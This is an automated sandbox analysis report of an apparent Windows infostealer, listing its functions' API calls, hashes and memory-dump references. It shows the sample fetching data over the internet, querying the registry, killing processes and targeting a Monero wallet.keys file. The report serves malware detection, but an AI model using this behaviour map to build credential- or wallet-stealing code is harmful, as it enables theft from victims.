                                        Download Yara Rule
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 0082FA1F
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0082FA27
                                        • _ValidateLocalCookies.LIBCMT ref: 0082FAB0
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0082FADB
                                        • _ValidateLocalCookies.LIBCMT ref: 0082FB30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction ID: 0afe921ff121cabfca135c3fa392cb3aa93b5eade3b36d902992e73bf19ca820
                                        • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction Fuzzy Hash: D3419330A00229EBCF10DF68D894A9E7BB5FF49324F148175EA19EB392D7319945CF91
                                        Function 007B5000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007B501A
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007B5021
                                        • InternetOpenA.WININET(007D0DE3,00000000,00000000,00000000,00000000), ref: 007B503A
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 007B5061
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 007B5091
                                        • InternetCloseHandle.WININET(?), ref: 007B5109
                                        • InternetCloseHandle.WININET(?), ref: 007B5116
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: fc50f92cc2ae86aed2b9117b3d46813b4a58c13fea0160cde72acf863bbc7ff6
                                        • Instruction ID: 29b637f2edd2d93acb9356d999249d36d34b3e1f89bb7d38238b94ffb9d7dcd9
                                        • Opcode Fuzzy Hash: fc50f92cc2ae86aed2b9117b3d46813b4a58c13fea0160cde72acf863bbc7ff6
                                        • Instruction Fuzzy Hash: E6311AB4A0421CABDB20DF94CC89BDCB7B4AB48304F2081D9F709A7281D7746EC58F98
                                        Function 007C856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007C85B6
                                        • wsprintfA.USER32 ref: 007C85E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 007C860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C8629
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                        • RegQueryValueExA.ADVAPI32(00000000,0165E940,00000000,000F003F,?,00000400), ref: 007C867C
                                        • lstrlen.KERNEL32(?), ref: 007C8691
                                        • RegQueryValueExA.ADVAPI32(00000000,0165E8C8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,007D0B3C), ref: 007C8729
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C8798
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C87AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 7b8937d221ce31c9622236a4ff6e4a4bb1e4831e89a40fe473538bad5cbedac3
                                        • Instruction ID: 2d60d44bc24ce4818e95760a5fa4344426fd4dae977da0faf2c99fbb8a370676
                                        • Opcode Fuzzy Hash: 7b8937d221ce31c9622236a4ff6e4a4bb1e4831e89a40fe473538bad5cbedac3
                                        • Instruction Fuzzy Hash: A3211971A1021CABDB64DB94DC85FE9B3B8FB48704F10C1DCA609A6180DF74AA85CFE4
                                        Function 007C99A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C99C5
                                        • Process32First.KERNEL32(007BA056,00000128), ref: 007C99D9
                                        • Process32Next.KERNEL32(007BA056,00000128), ref: 007C99F2
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C9A4E
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 007C9A6C
                                        • CloseHandle.KERNEL32(00000000), ref: 007C9A79
                                        • CloseHandle.KERNEL32(007BA056), ref: 007C9A88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: 96556f192aee3e3623776ec83cb1c77155fedfc837841c8a2914e5c98f578f6f
                                        • Instruction ID: ac1a1c2fab27b8ac4a68b470df572437373ab41fe51e160d75c5c5a0a172b755
                                        • Opcode Fuzzy Hash: 96556f192aee3e3623776ec83cb1c77155fedfc837841c8a2914e5c98f578f6f
                                        • Instruction Fuzzy Hash: 6121EA71904218EBDB61DFA1DC8CBDDB7B5BB48700F1081CCE609A6290DB789E85CF50
                                        Function 007C7820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C7834
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C783B
                                        • RegOpenKeyExA.ADVAPI32(80000002,0164B8D8,00000000,00020119,00000000), ref: 007C786D
                                        • RegQueryValueExA.ADVAPI32(00000000,0165E9E8,00000000,00000000,?,000000FF), ref: 007C788E
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C7898
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 0dfdceb9bfc93499fe266338ce250124e91c27f7286f949024b68ae7e668d05b
                                        • Instruction ID: 5ccd67523a7984da7121d03554d761f81f96e9e9a613903d398bccb632453244
                                        • Opcode Fuzzy Hash: 0dfdceb9bfc93499fe266338ce250124e91c27f7286f949024b68ae7e668d05b
                                        • Instruction Fuzzy Hash: 2901FF75A48305BBEB04DBE4DD4DFAE77B8EB48700F104198FA05A6290EB74A901CB50
                                        Function 007C78B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007C78C4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 007C78CB
                                        • RegOpenKeyExA.ADVAPI32(80000002,0164B8D8,00000000,00020119,007C7849), ref: 007C78EB
                                        • RegQueryValueExA.ADVAPI32(007C7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 007C790A
                                        • RegCloseKey.ADVAPI32(007C7849), ref: 007C7914
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: 28f1ed82e3ed692ef91a899d9af6f961e9a8048da6a3879c0ffea79d82105a47
                                        • Instruction ID: b9d610b50479053e77bc1bb0379356561b74023d12e719db3fe3b0feef2986b2
                                        • Opcode Fuzzy Hash: 28f1ed82e3ed692ef91a899d9af6f961e9a8048da6a3879c0ffea79d82105a47
                                        • Instruction Fuzzy Hash: 6B0112B5A44309BFEB00DBE4DC4AFAEB778EB44700F104599F605A7291EB74AA01CB91
                                        Function 007C9470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(>=|,80000000,00000003,00000000,00000003,00000080,00000000,?,007C3D3E,?), ref: 007C948C
                                        • GetFileSizeEx.KERNEL32(000000FF,>=|), ref: 007C94A9
                                        • CloseHandle.KERNEL32(000000FF), ref: 007C94B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID: >=|$>=|
                                        • API String ID: 1378416451-3540557206
                                        • Opcode ID: 5db64b7e46b894f9f4f2e90f227ff0827f78d09d6be57659756f6523c637a04d
                                        • Instruction ID: 06f37de0e9e9e0bc7130e040771afaa57fdd5322a2dc4e776eac162a798c6e2a
                                        • Opcode Fuzzy Hash: 5db64b7e46b894f9f4f2e90f227ff0827f78d09d6be57659756f6523c637a04d
                                        • Instruction Fuzzy Hash: 32F03135E04208BBDB54DBF0EC4DF5F77BAAB48710F208658FA11A7190DA7497029B40
                                        Function 007BA110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007BA13C
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 007BA161
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 007BA181
                                        • ReadFile.KERNEL32(000000FF,?,00000000,007B148F,00000000), ref: 007BA1AA
                                        • LocalFree.KERNEL32(007B148F), ref: 007BA1E0
                                        • CloseHandle.KERNEL32(000000FF), ref: 007BA1EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 9dc19aa47de097bc3fd8d36d6644eb416c307c04f71b1200baea858a80eb8515
                                        • Instruction ID: 15b7e0c2c456f28fb8d28d0681e6fa11e9b48a52b62d134b17ed6cef500285cd
                                        • Opcode Fuzzy Hash: 9dc19aa47de097bc3fd8d36d6644eb416c307c04f71b1200baea858a80eb8515
                                        • Instruction Fuzzy Hash: 3E31CC74A0420DEFDB14DFA4D885BEE77B5BF48705F108158E911A7290D778AA81CFA1
                                        Function 007C49D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcat.KERNEL32(?,0165EC70), ref: 007C4A2B
                                          • Part of subcall function 007C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007C8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C4A51
                                        • lstrcat.KERNEL32(?,?), ref: 007C4A70
                                        • lstrcat.KERNEL32(?,?), ref: 007C4A84
                                        • lstrcat.KERNEL32(?,0164A898), ref: 007C4A97
                                        • lstrcat.KERNEL32(?,?), ref: 007C4AAB
                                        • lstrcat.KERNEL32(?,0165DBA0), ref: 007C4ABF
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007C8F20: GetFileAttributesA.KERNEL32(00000000,?,007B1B94,?,?,007D577C,?,?,007D0E22), ref: 007C8F2F
                                          • Part of subcall function 007C47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007C47D0
                                          • Part of subcall function 007C47C0: RtlAllocateHeap.NTDLL(00000000), ref: 007C47D7
                                          • Part of subcall function 007C47C0: wsprintfA.USER32 ref: 007C47F6
                                          • Part of subcall function 007C47C0: FindFirstFileA.KERNEL32(?,?), ref: 007C480D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: 486f07fd55da75a947b334dcac7f61d6e46515d1be8f239ae561ffcba412ad16
                                        • Instruction ID: 68a787850d0f716cfdba5b3783d2b06b660c70209e53ce94fa30bd90fc6ebefa
                                        • Opcode Fuzzy Hash: 486f07fd55da75a947b334dcac7f61d6e46515d1be8f239ae561ffcba412ad16
                                        • Instruction Fuzzy Hash: FD3140F2900218A7DB14EBB0DC99FDD733CAB58700F40458DB24596051EE78EBC9CB95
                                        Function 007C2EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
